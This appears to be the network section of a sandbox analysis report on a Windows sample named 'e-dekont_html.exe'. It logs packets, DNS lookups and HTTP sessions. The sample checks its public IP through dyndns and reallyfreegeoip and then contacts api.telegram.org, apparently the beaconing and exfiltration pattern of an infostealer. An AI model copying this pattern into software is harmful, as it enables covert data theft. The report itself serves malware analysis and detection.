                                                                                                                                                        Nov 20, 2024 07:52:21.284296989 CET44349750188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:21.284358025 CET44349750188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:21.284425974 CET49750443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:21.284936905 CET49750443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:21.290508986 CET4975180192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:21.300534010 CET4975480192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:21.305381060 CET8049754193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:21.305478096 CET4975480192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:21.305669069 CET4975480192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:21.310518980 CET8049754193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:21.722657919 CET44349752188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:21.757750988 CET49752443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:21.757781029 CET44349752188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:21.872848988 CET44349752188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:21.873034954 CET44349752188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:21.873128891 CET49752443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:21.875493050 CET49752443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:21.893385887 CET4975180192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:21.894094944 CET4975580192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:21.898513079 CET8049751193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:21.898585081 CET4975180192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:21.898973942 CET8049755193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:21.899059057 CET4975580192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:21.899164915 CET4975580192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:21.904015064 CET8049755193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:23.158598900 CET8049754193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:23.160501957 CET49759443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:23.160567045 CET44349759188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:23.160695076 CET49759443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:23.161106110 CET49759443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:23.161123037 CET44349759188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:23.212373018 CET4975480192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:23.388186932 CET8049755193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:23.389473915 CET49760443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:23.389523983 CET44349760188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:23.389657021 CET49760443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:23.389938116 CET49760443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:23.389955044 CET44349760188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:23.431340933 CET4975580192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:23.636738062 CET44349759188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:23.646564960 CET49759443192.168.2.4188.114.96.3
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Nov 20, 2024 07:52:23.646646023 CET  443          49759      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:23.778620958 CET  443          49759      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:23.778686047 CET  443          49759      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:23.778948069 CET  49759        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:23.779361010 CET  49759        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:23.783706903 CET  49762        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:23.783992052 CET  49754        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:23.788772106 CET  80           49762      193.122.130.0    192.168.2.4
Nov 20, 2024 07:52:23.788832903 CET  49762        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:23.788970947 CET  49762        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:23.789465904 CET  80           49754      193.122.130.0    192.168.2.4
Nov 20, 2024 07:52:23.789511919 CET  49754        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:23.793796062 CET  80           49762      193.122.130.0    192.168.2.4
Nov 20, 2024 07:52:23.874299049 CET  443          49760      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:23.884010077 CET  49760        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:23.884030104 CET  443          49760      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:24.029120922 CET  443          49760      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:24.029186964 CET  443          49760      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:24.029314041 CET  49760        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:24.035851002 CET  49760        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:24.069381952 CET  49755        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:24.071445942 CET  49763        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:24.074882030 CET  80           49755      193.122.130.0    192.168.2.4
Nov 20, 2024 07:52:24.074959040 CET  49755        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:24.076466084 CET  80           49763      193.122.130.0    192.168.2.4
Nov 20, 2024 07:52:24.076560974 CET  49763        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:24.076741934 CET  49763        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:24.083189964 CET  80           49763      193.122.130.0    192.168.2.4
Nov 20, 2024 07:52:25.552380085 CET  80           49762      193.122.130.0    192.168.2.4
Nov 20, 2024 07:52:25.558695078 CET  49765        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:25.558743000 CET  443          49765      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:25.559009075 CET  49765        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:25.561306953 CET  49765        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:25.561319113 CET  443          49765      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:25.603216887 CET  49762        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:25.731915951 CET  80           49763      193.122.130.0    192.168.2.4
Nov 20, 2024 07:52:25.733099937 CET  61280        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:25.733150959 CET  443          61280      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:25.733383894 CET  61280        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:25.733659983 CET  61280        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:25.733675003 CET  443          61280      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:25.774918079 CET  49763        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:26.016578913 CET  443          49765      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:26.027354956 CET  49765        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:26.027396917 CET  443          49765      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:26.148950100 CET  443          49765      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:26.149024010 CET  443          49765      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:26.149152040 CET  49765        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:26.149681091 CET  49765        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:26.154051065 CET  49762        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:26.154871941 CET  61281        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:26.159153938 CET  80           49762      193.122.130.0    192.168.2.4
Nov 20, 2024 07:52:26.159212112 CET  49762        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:26.159702063 CET  80           61281      193.122.130.0    192.168.2.4
Nov 20, 2024 07:52:26.159778118 CET  61281        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:26.159900904 CET  61281        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:26.164675951 CET  80           61281      193.122.130.0    192.168.2.4
Nov 20, 2024 07:52:26.208085060 CET  443          61280      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:26.218035936 CET  61280        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:26.218076944 CET  443          61280      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:26.360060930 CET  443          61280      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:26.360141993 CET  443          61280      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:26.360197067 CET  61280        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:26.360714912 CET  61280        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:26.377496004 CET  49763        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:26.382683992 CET  80           49763      193.122.130.0    192.168.2.4
Nov 20, 2024 07:52:26.382733107 CET  49763        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:26.386410952 CET  61282        443        192.168.2.4      149.154.167.220
Nov 20, 2024 07:52:26.386442900 CET  443          61282      149.154.167.220  192.168.2.4
Nov 20, 2024 07:52:26.386502981 CET  61282        443        192.168.2.4      149.154.167.220
Nov 20, 2024 07:52:26.386971951 CET  61282        443        192.168.2.4      149.154.167.220
Nov 20, 2024 07:52:26.386981964 CET  443          61282      149.154.167.220  192.168.2.4
Nov 20, 2024 07:52:26.906852961 CET  80           61281      193.122.130.0    192.168.2.4
Nov 20, 2024 07:52:26.939892054 CET  61283        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:26.939930916 CET  443          61283      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:26.940021992 CET  61283        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:26.940779924 CET  61283        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:26.940793991 CET  443          61283      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:26.962404013 CET  61281        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:27.007286072 CET  443          61282      149.154.167.220  192.168.2.4
Nov 20, 2024 07:52:27.007400990 CET  61282        443        192.168.2.4      149.154.167.220
Nov 20, 2024 07:52:27.057197094 CET  61282        443        192.168.2.4      149.154.167.220
Nov 20, 2024 07:52:27.057235956 CET  443          61282      149.154.167.220  192.168.2.4
Nov 20, 2024 07:52:27.057574034 CET  443          61282      149.154.167.220  192.168.2.4
Nov 20, 2024 07:52:27.059108019 CET  61282        443        192.168.2.4      149.154.167.220
Nov 20, 2024 07:52:27.099323988 CET  443          61282      149.154.167.220  192.168.2.4
Nov 20, 2024 07:52:27.285608053 CET  443          61282      149.154.167.220  192.168.2.4
Nov 20, 2024 07:52:27.285705090 CET  443          61282      149.154.167.220  192.168.2.4
Nov 20, 2024 07:52:27.285782099 CET  61282        443        192.168.2.4      149.154.167.220
Nov 20, 2024 07:52:27.327327013 CET  61282        443        192.168.2.4      149.154.167.220
Nov 20, 2024 07:52:27.429968119 CET  443          61283      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:27.446254969 CET  61283        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:27.446309090 CET  443          61283      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:27.582225084 CET  443          61283      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:27.582312107 CET  443          61283      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:27.582443953 CET  61283        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:27.582930088 CET  61283        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:27.586882114 CET  61281        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:27.588591099 CET  61284        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:27.592119932 CET  80           61281      193.122.130.0    192.168.2.4
Nov 20, 2024 07:52:27.592705965 CET  61281        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:27.593545914 CET  80           61284      193.122.130.0    192.168.2.4
Nov 20, 2024 07:52:27.593651056 CET  61284        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:27.593836069 CET  61284        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:27.598674059 CET  80           61284      193.122.130.0    192.168.2.4
Nov 20, 2024 07:52:29.172739983 CET  80           61284      193.122.130.0    192.168.2.4
Nov 20, 2024 07:52:29.174340963 CET  61285        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:29.174391031 CET  443          61285      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:29.174487114 CET  61285        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:29.174792051 CET  61285        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:29.174808025 CET  443          61285      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:29.228024960 CET  61284        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:29.628767967 CET  443          61285      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:29.631058931 CET  61285        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:29.631083965 CET  443          61285      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:29.774925947 CET  443          61285      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:29.774995089 CET  443          61285      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:29.775134087 CET  61285        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:29.775760889 CET  61285        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:29.780258894 CET  61284        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:29.781481028 CET  61286        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:29.786473036 CET  80           61286      193.122.130.0    192.168.2.4
Nov 20, 2024 07:52:29.786556959 CET  61286        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:29.786611080 CET  80           61284      193.122.130.0    192.168.2.4
Nov 20, 2024 07:52:29.786780119 CET  61284        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:29.786780119 CET  61286        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:29.791691065 CET  80           61286      193.122.130.0    192.168.2.4
Nov 20, 2024 07:52:30.439938068 CET  80           61286      193.122.130.0    192.168.2.4
Nov 20, 2024 07:52:30.441859961 CET  61287        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:30.441915989 CET  443          61287      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:30.442086935 CET  61287        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:30.442451000 CET  61287        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:30.442467928 CET  443          61287      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:30.493685961 CET  61286        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:30.929121971 CET  443          61287      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:30.931087017 CET  61287        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:30.931107044 CET  443          61287      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:31.077049971 CET  443          61287      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:31.077121019 CET  443          61287      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:31.077210903 CET  61287        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:31.077785015 CET  61287        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:31.082248926 CET  61286        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:31.082889080 CET  61288        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:31.087631941 CET  80           61286      193.122.130.0    192.168.2.4
Nov 20, 2024 07:52:31.087696075 CET  61286        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:31.087738991 CET  80           61288      193.122.130.0    192.168.2.4
Nov 20, 2024 07:52:31.087804079 CET  61288        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:31.087949038 CET  61288        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:31.092755079 CET  80           61288      193.122.130.0    192.168.2.4
Nov 20, 2024 07:52:31.563946009 CET  80           61288      193.122.130.0    192.168.2.4
Nov 20, 2024 07:52:31.565932989 CET  61289        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:31.565992117 CET  443          61289      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:31.566203117 CET  61289        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:31.566581964 CET  61289        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:31.566602945 CET  443          61289      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:31.618767023 CET  61288        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:32.029791117 CET  443          61289      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:32.031636953 CET  61289        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:32.031680107 CET  443          61289      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:32.180910110 CET  443          61289      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:32.180991888 CET  443          61289      188.114.96.3     192.168.2.4
Nov 20, 2024 07:52:32.181152105 CET  61289        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:32.181806087 CET  61289        443        192.168.2.4      188.114.96.3
Nov 20, 2024 07:52:32.191895962 CET  61288        80         192.168.2.4      193.122.130.0
Nov 20, 2024 07:52:32.192878008 CET  61290        443        192.168.2.4      149.154.167.220
Nov 20, 2024 07:52:32.192959070 CET  443          61290      149.154.167.220  192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:32.193064928 CET61290443192.168.2.4149.154.167.220
                                                                                                                                                        Nov 20, 2024 07:52:32.193679094 CET61290443192.168.2.4149.154.167.220
                                                                                                                                                        Nov 20, 2024 07:52:32.193696976 CET44361290149.154.167.220192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:32.197304964 CET8061288193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:32.197372913 CET6128880192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:32.810045958 CET44361290149.154.167.220192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:32.810307026 CET61290443192.168.2.4149.154.167.220
                                                                                                                                                        Nov 20, 2024 07:52:32.811769009 CET61290443192.168.2.4149.154.167.220
                                                                                                                                                        Nov 20, 2024 07:52:32.811814070 CET44361290149.154.167.220192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:32.812747955 CET44361290149.154.167.220192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:32.814323902 CET61290443192.168.2.4149.154.167.220
                                                                                                                                                        Nov 20, 2024 07:52:32.859349012 CET44361290149.154.167.220192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:33.060009003 CET44361290149.154.167.220192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:33.060094118 CET44361290149.154.167.220192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:33.060167074 CET61290443192.168.2.4149.154.167.220
                                                                                                                                                        Nov 20, 2024 07:52:33.062693119 CET61290443192.168.2.4149.154.167.220
                                                                                                                                                        Nov 20, 2024 07:52:43.379934072 CET4973880192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:49.243485928 CET4974980192.168.2.4193.122.130.0
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 20, 2024 07:52:10.302706003 CET | 54483 | 53 | 192.168.2.4 | 1.1.1.1
Nov 20, 2024 07:52:10.310097933 CET | 53 | 54483 | 1.1.1.1 | 192.168.2.4
Nov 20, 2024 07:52:12.672609091 CET | 54678 | 53 | 192.168.2.4 | 1.1.1.1
Nov 20, 2024 07:52:12.679936886 CET | 53 | 54678 | 1.1.1.1 | 192.168.2.4
Nov 20, 2024 07:52:20.010752916 CET | 58340 | 53 | 192.168.2.4 | 1.1.1.1
Nov 20, 2024 07:52:20.018009901 CET | 53 | 58340 | 1.1.1.1 | 192.168.2.4
Nov 20, 2024 07:52:25.644753933 CET | 53 | 64781 | 1.1.1.1 | 192.168.2.4
Nov 20, 2024 07:52:26.378350019 CET | 53743 | 53 | 192.168.2.4 | 1.1.1.1
Nov 20, 2024 07:52:26.385658026 CET | 53 | 53743 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 20, 2024 07:52:10.302706003 CET | 192.168.2.4 | 1.1.1.1 | 0x7acf | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Nov 20, 2024 07:52:12.672609091 CET | 192.168.2.4 | 1.1.1.1 | 0xedcc | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Nov 20, 2024 07:52:20.010752916 CET | 192.168.2.4 | 1.1.1.1 | 0x891c | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Nov 20, 2024 07:52:26.378350019 CET | 192.168.2.4 | 1.1.1.1 | 0x2fd0 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 20, 2024 07:52:10.310097933 CET | 1.1.1.1 | 192.168.2.4 | 0x7acf | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 20, 2024 07:52:10.310097933 CET | 1.1.1.1 | 192.168.2.4 | 0x7acf | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 07:52:10.310097933 CET | 1.1.1.1 | 192.168.2.4 | 0x7acf | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 07:52:10.310097933 CET | 1.1.1.1 | 192.168.2.4 | 0x7acf | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 07:52:10.310097933 CET | 1.1.1.1 | 192.168.2.4 | 0x7acf | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 07:52:10.310097933 CET | 1.1.1.1 | 192.168.2.4 | 0x7acf | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 07:52:12.679936886 CET | 1.1.1.1 | 192.168.2.4 | 0xedcc | No error (0) | reallyfreegeoip.org | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 07:52:12.679936886 CET | 1.1.1.1 | 192.168.2.4 | 0xedcc | No error (0) | reallyfreegeoip.org | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 07:52:20.018009901 CET | 1.1.1.1 | 192.168.2.4 | 0x891c | No error (0) | reallyfreegeoip.org | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 07:52:20.018009901 CET | 1.1.1.1 | 192.168.2.4 | 0x891c | No error (0) | reallyfreegeoip.org | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 07:52:26.385658026 CET | 1.1.1.1 | 192.168.2.4 | 0x2fd0 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49733 | 193.122.130.0 | 80 | 7308 | C:\Users\user\Desktop\e-dekont_html.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:52:10.325648069 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Nov 20, 2024 07:52:11.369198084 CET | 320 | IN | HTTP/1.1 200 OK
    Date: Wed, 20 Nov 2024 06:52:11 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 0692645c0508c1d76532682d1acb3868
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 20, 2024 07:52:11.440049887 CET | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Nov 20, 2024 07:52:12.561940908 CET | 320 | IN | HTTP/1.1 200 OK
    Date: Wed, 20 Nov 2024 06:52:12 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 5b45d6737af18f3c783c76c1630a2a24
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 20, 2024 07:52:13.499758959 CET | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Nov 20, 2024 07:52:13.604727030 CET | 320 | IN | HTTP/1.1 200 OK
    Date: Wed, 20 Nov 2024 06:52:13 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: b934ffd403c3b37b184f814fc685a74e
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49738 | 193.122.130.0 | 80 | 7308 | C:\Users\user\Desktop\e-dekont_html.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:52:14.239823103 CET | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Nov 20, 2024 07:52:14.940684080 CET | 320 | IN | HTTP/1.1 200 OK
    Date: Wed, 20 Nov 2024 06:52:14 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 243d95896239242d7a05bd886335cd7d
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49740 | 193.122.130.0 | 80 | 7308 | C:\Users\user\Desktop\e-dekont_html.exe
Timestamp | Bytes transferred | Direction | Data
